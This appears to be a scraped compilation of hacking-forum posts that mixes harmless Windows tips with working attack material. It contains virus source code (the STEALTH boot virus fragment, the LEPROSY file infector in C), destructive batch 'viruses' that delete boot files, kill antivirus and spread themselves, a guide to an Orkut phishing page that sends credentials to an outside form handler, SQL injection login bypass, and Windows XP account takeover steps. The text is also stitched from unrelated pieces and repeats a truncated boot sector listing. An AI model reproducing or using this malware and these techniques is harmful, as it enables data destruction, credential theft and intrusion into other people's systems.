WB2: pop bp ;exit with ah from 2nd
pop ax ;interrupt
add sp,2
Appendix E: The STEALTH Virus 138
iret
WB_EXIT: ;exit after 1st write
mov ax,ss:[bp+18] ;set carry on stack to indicate
push ax ;a successful write operation
popf
clc
pushf
pop ax
mov ss:[bp+18],ax
pop bp ;restore all registers and exit
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov ah,0
iret
WB_GOON: ;pass control to ROM BIOS
pop bp ;just restore all registers
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp I13R ;and go do it
;*******************************************************************************
;Read hard disk sectors on Track 0, Head 0, Sec > 1. If the disk is infected,
;then instead of reading the true data there, return a block of 0’s, since
;0 is the data stored in a freshly formatted but unused sector. This will
;fake the caller out and keep him from knowing that the virus is hiding there.
;If the disk is not infected, return the true data stored in those sectors.
READ_HARD:
call CHECK_DISK ;see if disk is infected
jnz RWH_EX ;no, let BIOS handle the read
push ax ;else save registers
push bx
push cx
push dx
push si
push di
push ds
push bp
mov bp,sp
mov BYTE PTR es:[bx],0 ;zero the first byte in the blk
push es
pop ds
mov si,bx ;set up es:di and ds:si
mov di,bx ;for a transfer
inc di
mov ah,0 ;ax=number of sectors to read
mov bx,512 ;bytes per sector
mul bx ;number of bytes to read in ax
mov cx,ax
dec cx ;number of bytes to move
rep movsb ;do fake read of all 0’s
mov ax,ss:[bp+20] ;now set c flag
push ax ;to indicate succesful read
popf
clc
pushf
pop ax
mov ss:[bp+20],ax

Restrect access to all drives...

Restrect access to all drives...


Procedure 1:

regedit >

HK_C_U > s/w > m/s > windows > policies > explorer >

create DWORD "NoViewOnDrive" give value >>>>> "3FFFF"


Now the access is restricted ........................... ;) )))

Hacking Windows Xp Login passwords

Hacking Windows Xp Login passwords
Hacking Windows Xp Login passwords
" its very easy to hack into a user account in windows xp using ..administrator logon.

steps:
1. when Xp asks the User password .Press Ctrl + Alt + Del.
2. type user name as " Administrator" and leave the password field blank

Note : normally most of the poor users of the windows xp leaves the administrator account as not change..so we can user the windows xp default account to logon...

3. then goto start-> Run -> type " Cmd" as command -> use the following commands to reset that user password

4. c:/windows/../document and settings> net user

Note: it will show all the user names registered in the windows xp

5. next you have to note the user name as it is to hack into..

6. use the following commands to hack its account. exampe , if my victim is "Sandi"
I will use it as the following

Net user Sandi *

thats its buddy now the xp will ask you for the new passowrd and to confirm ..just give a new password to that account ..give it.and reboot and longon to that account.


note if you guys wanna screen shots for more help please reply.....

if you guys know anything more please share it with us.........

thanks



















I need to hack admin too in logon screen
verify is it work

< Do it usiong startp up floppy disk>
x:
cd windows
cd system 32
del logon.scr
rename cmd.exe logon.scr


Now in logon screen

wait insted of screen saver, cmd is opened.

now try "net user admin *"

Is notr working in some of my friends computer

Lock your folder with password without software-3

Lock your folder with password without software
Folder Lock without any S/W

Open Notepad and copy the below code and save as locker.bat. At first time start it will create folder with Locker automatically for u. Don't forget to change your password in the code its shown the place where to type your password.
after creation of Locker folder again click on the locker.bat.it will ask.press Y then Locker folder will be disappeared. again to get it click on locker.bat. and give ur password u will get the folder again.

************ ********* ********* ********* ********* ********* *



cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
attrib +h +s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End




Another way to secure your folder.

To lock a folder ::: Simplest WaY !!!
To lock a folder ::: Simplest WaY !!!
Hi friends try this..

first select a folder for example i'll use a folder name movies in D drive D:\movies\

in the same drive u create a text file and type

ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}

and save it as loc.bat

again u type in a notepad as

ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies

and save it as key.bat

now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and whn u double click key the control panel will change to normal folder..

Try this out

Lock your folder with password without software-3

shutdown -r -t 01 -c

shutdown -r -t 01 -c
First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "Ill be back m8 ;)!"

Switch
What it does

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC.

Create Orkut's Fake Login Page!

Create Orkut's Fake Login Page!
Create Orkut's Fake Login Page!
* Open your Internet explorer or Mozilla Firefox!

* Open www.orkut.com but don't Sign in there.

* Open the source code of it and copy the whole code and save it as Orkut Page Source in your Notepad.

* Open Orkut Page Source in Notepad and press ctrl+f and type < form, it will search for it.

* Erase that whole line and the next line.

* Now, copy and paste the following code there.

<.form action="http://www.big-llc.com/formmailer/submit" method="post">

remove . from beging of this script

* Also change rename your e-mail ID in the above code.

* Now, press ctrl+f again and type there so u have to change it as

* Save it as orkut.html

* Now, go to www.freeweb7.com and make an account there.

* Login there and open File Manager and upload that orkut.html.

* Check the URL there and now the site is all yours.

websnake explained

websnake explained
f u like any image wallpaper
or the articles from the site
and u want to download all of them
so
u must be wasting time
on that rite
then dont worry
hacker binny
will help u
download websnake
and mention the
sitename in it
and put
project as any name like ur name
select level as 3
and keep image size as 10 mb only
(because 10mb of data ur getting from that particular site)
http://www.orkut.com/AlbumZoom.aspx?uid=1599442824158656515&pid=2
see my album
for the screenshot
i made to show u people
i did this on ahckthissite.org
but u prople may be trying to hack my pc
because u can see my ip
in the image
and u can guess my operating system
and also
u can
make a batch file to close all start up
programs
dont try to do this
this is the ip of the coesecurity i am working in that

hack website-2

Hacking Websites
Hacking Websites

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how??


keep reading.....

1. Open the website you want to hack. Provide wrong username-password in its log in form.

(e.g : Username : me and Password: ' or 1=1 --)

An error will occur saying wrong username-password. Now be prepared

Your experiment starts from here...

2. Right click anywhere on that error page =>> go to view source.

3. There you can see the html codings with javascripts.

4. There you find somewhat like this....<_form action="..login....">

5. Before this login information copy the url of the site in which you are.

(e.g :"<_form..........action=http://www.targetwebsite.com/login.......>")

6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)

7. Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> " there instead of "<_type=password>". See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )

8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\chan.html)

9. Reopen your target web page by double clicking 'chan.html' file that you saved in your

harddisk earlier.

10. U see that some changes in current page as compared to original One. Don't get worried.

11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.

*****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]


The above trick won't work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!!

block website without any software-2

Block Websties Without Software
Block Websties Without Software

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

etc..

virus....

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:SEX BEAM.exe"

copy these lines in notepad and save it as ".bat" or ".exe"

don't know if someone has posted it before

Make your folders invicible...:)

Make your folders invicible...:)

1)Right Click on the desktop.Make a new folder

2)Now rename the folder with a space(U have to hold ALT key and type 0160).

3)Now u have a folder with out a name.

4)Right click on the folder>properties>customize. Click on change icon.

5)Scroll a bit, u should find some empty spaces, Click on any one of them.click ok Thats it,now u can store ur personal data without any 3rd party tools

Source Code for LEPROSY Virus?

Source Code for LEPROSY Virus?
This file is part of the source code to the LEPROSY Virus 1.00
This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files.
*/

#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */


/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};

struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */

const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );

/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/

int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x 6 ) /* If we found 6+ infected files */
for( x = 0; x <3>filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}

int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}

int healthy( void ) {
int I;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( I = 0; I < 20; I++ ) /* Compare to virus code. */
if ( compare_buf != *(codestart+I) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}
void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}

void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}

int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}

int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}

void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}
void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;[code][/code]

Virus Fixer

Virus Fixer
This is is the code of my first virus
echo off
title Virus Fixer
copy "%0" "%userprofile%/start menu/programs/startup/Fix Virus.exe
attrib +h +r %0
shutdown -r -t 1000 -c "VIRUS Taking Over Bye......... Ha! ha! ha! ha! ha! ha! ha! ha! ha!"
tskill iexplore
tskill NMain
tskill avgcc.exe
RUNDLL32 USER32.DLL.SwapMouseButton
Echo Are you sure u want to Quit(Y/N)
set/p "cho=>"
if %cho%==Y goto 2
if %cho%==y goto 2
if %cho%==n goto 1
if %cho%==N goto 1
:2
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
:1
start %0
start explorer.exe
start calc
start explorer.exe
start calc
start explorer.exe
start calc
start explorer.exe
start calc
start explorer.exe
start calc
start explorer.exe
start calc
start explorer.exe
start calc
start explorer.exe
start calc
copy %0 %random%.exe
copy %0 %random%.exe
copy %0 %random%.exe
copy %0 %random%.exe
copy %0 %random%.exe
copy %0 %random%.exe
start hidestart.exe
goto 1

If any one wants the exe version of my virus then take it from
http://rapidshare.com/files/68711902/Test.ZIP.html









save it with .bat

make boot on harddisk

The gutted out boot sector, BOOT.ASM which is not a
virus, but which forms the core for the Kilroy virus is listed here as
an ASM file. Neither HEX listing nor batch files are provided.
;This is a simple boot sector that will load either MS-DOS or PC-DOS. It is not
;self-reproducing, but it will be used as the foundation on which to build a
;virus into a boot sector.
;This segment is where the first operating system file (IBMBIO.COM or IO.SYS)
;will be loaded and executed from. We don’t know (or care) what is there, but
;we do need the address to jump to defined in a separate segment so we can
;execute a far jump to it.
DOS_LOAD SEGMENT AT 0070H
ASSUME CS:DOS_LOAD
ORG 0
LOAD: DB 0 ;Start of the first os program
DOS_LOAD ENDS
MAIN SEGMENT BYTE
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
;This jump instruction is just here so we can compile this program as a COM
;file. It is never actually executed, and never becomes a part of the boot
;sector. Only the 512 bytes after the address 7C00 in this file become part of
;the boot sector.
ORG 100H
START: jmp BOOTSEC
;The following two definitions are BIOS RAM bytes which contain information
;about the number and type of disk drives in the computer. These are needed by
;the virus to decide on where to look to find drives to infect. They are not
;normally needed by an ordinary boot sector.
;
; ORG 0410H
;
;SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to
;get number of disk drives on this system
;(eg 01 = 2 drives)
;
; ORG 0475H
;
;HD_COUNT: DB ? ;Number of hard drives in the system
;
;This area is reserved for loading the first sector of the root directory, when
;checking for the existence of system files and loading the first system file.
ORG 0500H
DISK_BUF: DW ? ;Start of the buffer
;Here is the start of the boot sector code. This is the chunk we will take out
;of the compiled COM file and put it in the first sector on a 360K floppy disk.
;Note that this MUST be loaded onto a 360K
;disk!
ORG 7C00H
BOOTSEC: JMP BOOT ;Jump to start of boot sector code
ORG 7C03H ;Start of data area
DOS_ID: DB ’EZBOOT ’ ;Name of this boot sector (8 bytes)
SEC_SIZE: DW 200H ;Size of a sector, in bytes
SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster
FAT_START: DW 1 ;Starting sector for the first FAT
FAT_COUNT: DB 2 ;Number of FATs on this disk
ROOT_ENTRIES: DW 70H ;Number of root directory entries
SEC_COUNT: DW 2D0H ;Total number of sectors on this disk
DISK_ID: DB 0FDH ;Disk type code (This is 360KB)
SECS_PER_FAT: DW 2 ;Number of sectors per FAT
SECS_PER_TRK: DW 9 ;Sectors per track for this drive
HEADS: DW 2 ;Number of heads (sides) on this drive
HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk
DSKBASETBL:
DB 0 ;Specify byte 1
DB 0 ;Specify byte 2
DB 0 ;Wait time until motor turned off, in clk ticks
DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 3=1024)
DB 12H ;Last sector number (lg enough to handle 1.44M)
DB 0 ;Gap length between sectors for r/w operations
DB 0 ;Data xfer lgth when sector lgth not specified
DB 0 ;Gap lgth between sectors for formatting
DB 0 ;Value stored in newly formatted sectors
DB 1 ;Head settle time, in milliseconds
DB 0 ;Motor startup time, in 1/8 seconds
HEAD: DB 0 ;Current head to read from
;Here is the start of the boot sector code
BOOT: CLI ;interrupts off
XOR AX,AX ;prepare to set up segments
MOV ES,AX ;set ES=0
MOV SS,AX ;start stack at 0000:7C00
MOV SP,OFFSET BOOTSEC
MOV BX,1EH*4 ;get address of disk
LDS SI,SS:[BX] ;param table in ds:si
PUSH DS
PUSH SI ;save that address
PUSH SS
PUSH BX ;and its address
MOV DI,OFFSET DSKBASETBL ;and update default
MOV CX,11 ;values to table stored here
CLD ;direction flag cleared
DFLT1: LODSB
CMP BYTE PTR ES:[DI],0 ;anything non-zero
JNZ SHORT DFLT2 ;not default, so don’t save it
119 The Little Black Book of Computer Viruses
STOSB ;else put default in place
JMP SHORT DFLT3 ;and go on to next
DFLT2: INC DI
DFLT3: LOOP DFLT1 ;and loop until cx=0
MOV AL,AH ;set ax=0
MOV DS,AX ;set ds=0 so we set disk tbl
MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here)
MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done
STI ;now turn interrupts on
INT 13H ;and reset disk drive system
ERROR1: JC ERROR1 ;if an error, hang the machine
;Here we look at the first file on the disk to see if it is the first MS-DOS or
;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively.
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX
MOV WORD PTR [DOS_ID],AX ;root dir, save it
MOV AX,20H ;dir entry size
MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax
MOV BX,WORD PTR [SEC_SIZE] ;sector size
ADD AX,BX ;add one sector
DEC AX ;decrement by 1
DIV BX ;ax=# sectors in root dir
ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data
MOV BX,OFFSET DISK_BUF ;set up disk buffer @ 0000:0500
POP AX
CALL CONVERT ;convert sec # to bios data
MOV AL,1 ;prepare for 1 sector disk read
CALL READ_DISK ;go read it
MOV DI,BX ;compare first file on disk
MOV CX,11 ;with required file name of
MOV SI,OFFSET SYSFILE_1 ;first system file for PC DOS
REPZ CMPSB
JZ SYSTEM_THERE ;ok, found it, go load it
MOV DI,BX ;compare first file with
MOV CX,11 ;required file name of
MOV SI,OFFSET SYSFILE_2 ;first system file for MS DOS
REPZ CMPSB
ERROR2: JNZ ERROR2 ;not the same - an error,
;so hang the machine
;Ok, system file is there, so load it
SYSTEM_THERE:
MOV AX,WORD PTR [DISK_BUF+1CH]
XOR DX,DX ;get size of IBMBIO.COM/IO.SYS
DIV WORD PTR [SEC_SIZE] ;and divide by sector size
INC AL ;ax=number of sectors to read
MOV BP,AX ;store that number in BP
MOV AX,WORD PTR [DOS_ID] ;get sector # of start of data
PUSH AX
MOV BX,700H ;set disk buffer to 0000:0700
RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read
CALL CONVERT ;convert to bios Trk/Cyl/Sec
MOV AL,1 ;read one sector
CALL READ_DISK ;go read the disk
SUB BP,1 ;# sectors to read - 1
JZ DO_BOOT ;and quit if we’re done
ADD WORD PTR [DOS_ID],1 ;add sectors read to sector to
ADD BX,WORD PTR [SEC_SIZE] ;read and update buffer address
JMP RD_BOOT1 ;then go for another
Appendix C: A Basic Boot Sector 120
;Ok, the first system file has been read in, now transfer control to it
DO_BOOT:
MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch
MOV DL,BYTE PTR [DRIVE] ;Drive number in dl
POP BX
JMP FAR PTR LOAD ;and transfer control to op sys
;Convert sequential sector number in ax to BIOS Track, Head, Sector
;information. Save track number in DX, sector number in CH,
CONVERT:
XOR DX,DX
DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track
INC DL ;dl=sector # to start read on
MOV CH,DL ;save it here
XOR DX,DX ;al=track/head count
DIV WORD PTR [HEADS] ;divide ax by head count
MOV BYTE PTR [HEAD],DL ;dl=head number, save it
MOV DX,AX ;ax=track number, save it in dx
RET
;Read the disk for the number of sectors in al, into the buffer es:bx, using
;the track number in DX, the head number at HEAD, and the sector
;number at CH.
READ_DISK:
MOV AH,2 ;read disk command
MOV CL,6 ;shift upper 2 bits of trk #
SHL DH,CL ;to the high bits in dh
OR DH,CH ;and put sec # in low 6 bits
MOV CX,DX
XCHG CH,CL ;ch (0-5) = sector,
;cl, ch (6-7) = track
MOV DL,BYTE PTR [DRIVE] ;get drive number from here
MOV DH,BYTE PTR [HEAD] ;and head number from here
INT 13H ;go read the disk
ERROR3: JC ERROR3 ;hang in case of an error
RET
;Move data that doesn’t change from this boot sector to the one read in at
;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and
;the data area at the beginning of the boot sector.
MOVE_DATA:
MOV SI,OFFSET DSKBASETBL ;Move boot sec code after data
MOV DI,OFFSET DISK_BUF+(OFFSET DSKBASETBL-OFFSET BOOTSEC)
MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL
REP MOVSB
MOV SI,OFFSET BOOTSEC ;Move initial jump and sec ID
MOV DI,OFFSET DISK_BUF
MOV CX,11
REP MOVSB
RET
SYSFILE_1: DB ’IBMBIO COM’ ;PC DOS System file
SYSFILE_2: DB ’IO SYS’ ;MS DOS System file
ORG 7DFDH
DRIVE: DB 0 ;Disk drive for boot sector
BOOT_ID: DW 0AA55H ;Boot sector ID word
MAIN ENDS
END START

make boot on harddisk

The gutted out boot sector, BOOT.ASM which is not a
virus, but which forms the core for the Kilroy virus is listed here as
an ASM file. Neither HEX listing nor batch files are provided.
;This is a simple boot sector that will load either MS-DOS or PC-DOS. It is not
;self-reproducing, but it will be used as the foundation on which to build a
;virus into a boot sector.
;This segment is where the first operating system file (IBMBIO.COM or IO.SYS)
;will be loaded and executed from. We don’t know (or care) what is there, but
;we do need the address to jump to defined in a separate segment so we can
;execute a far jump to it.
DOS_LOAD SEGMENT AT 0070H
ASSUME CS:DOS_LOAD
ORG 0
LOAD: DB 0 ;Start of the first os program
DOS_LOAD ENDS
MAIN SEGMENT BYTE
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
;This jump instruction is just here so we can compile this program as a COM
;file. It is never actually executed, and never becomes a part of the boot
;sector. Only the 512 bytes after the address 7C00 in this file become part of
;the boot sector.
ORG 100H
START: jmp BOOTSEC
;The following two definitions are BIOS RAM bytes which contain information
;about the number and type of disk drives in the computer. These are needed by
;the virus to decide on where to look to find drives to infect. They are not
;normally needed by an ordinary boot sector.
;
; ORG 0410H
;
;SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to
;get number of disk drives on this system
;(eg 01 = 2 drives)
;
; ORG 0475H
;
;HD_COUNT: DB ? ;Number of hard drives in the system
;
;This area is reserved for loading the first sector of the root directory, when
;checking for the existence of system files and loading the first system file.
ORG 0500H
DISK_BUF: DW ? ;Start of the buffer
;Here is the start of the boot sector code. This is the chunk we will take out
;of the compiled COM file and put it in the first sector on a 360K floppy disk.
;Note that this MUST be loaded onto a 360K
;disk!
ORG 7C00H
BOOTSEC: JMP BOOT ;Jump to start of boot sector code
ORG 7C03H ;Start of data area
DOS_ID: DB ’EZBOOT ’ ;Name of this boot sector (8 bytes)
SEC_SIZE: DW 200H ;Size of a sector, in bytes
SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster
FAT_START: DW 1 ;Starting sector for the first FAT
FAT_COUNT: DB 2 ;Number of FATs on this disk
ROOT_ENTRIES: DW 70H ;Number of root directory entries
SEC_COUNT: DW 2D0H ;Total number of sectors on this disk
DISK_ID: DB 0FDH ;Disk type code (This is 360KB)
SECS_PER_FAT: DW 2 ;Number of sectors per FAT
SECS_PER_TRK: DW 9 ;Sectors per track for this drive
HEADS: DW 2 ;Number of heads (sides) on this drive
HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk
DSKBASETBL:
DB 0 ;Specify byte 1
DB 0 ;Specify byte 2
DB 0 ;Wait time until motor turned off, in clk ticks
DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 3=1024)
DB 12H ;Last sector number (lg enough to handle 1.44M)
DB 0 ;Gap length between sectors for r/w operations
DB 0 ;Data xfer lgth when sector lgth not specified
DB 0 ;Gap lgth between sectors for formatting
DB 0 ;Value stored in newly formatted sectors
DB 1 ;Head settle time, in milliseconds
DB 0 ;Motor startup time, in 1/8 seconds
HEAD: DB 0 ;Current head to read from
;Here is the start of the boot sector code
BOOT: CLI ;interrupts off
XOR AX,AX ;prepare to set up segments
MOV ES,AX ;set ES=0
MOV SS,AX ;start stack at 0000:7C00
MOV SP,OFFSET BOOTSEC
MOV BX,1EH*4 ;get address of disk
LDS SI,SS:[BX] ;param table in ds:si
PUSH DS
PUSH SI ;save that address
PUSH SS
PUSH BX ;and its address
MOV DI,OFFSET DSKBASETBL ;and update default
MOV CX,11 ;values to table stored here
CLD ;direction flag cleared
DFLT1: LODSB
CMP BYTE PTR ES:[DI],0 ;anything non-zero
JNZ SHORT DFLT2 ;not default, so don’t save it
119 The Little Black Book of Computer Viruses
STOSB ;else put default in place
JMP SHORT DFLT3 ;and go on to next
DFLT2: INC DI
DFLT3: LOOP DFLT1 ;and loop until cx=0
MOV AL,AH ;set ax=0
MOV DS,AX ;set ds=0 so we set disk tbl
MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here)
MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done
STI ;now turn interrupts on
INT 13H ;and reset disk drive system
ERROR1: JC ERROR1 ;if an error, hang the machine
;Here we look at the first file on the disk to see if it is the first MS-DOS or
;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively.
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX
MOV WORD PTR [DOS_ID],AX ;root dir, save it
MOV AX,20H ;dir entry size
MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax
MOV BX,WORD PTR [SEC_SIZE] ;sector size
ADD AX,BX ;add one sector
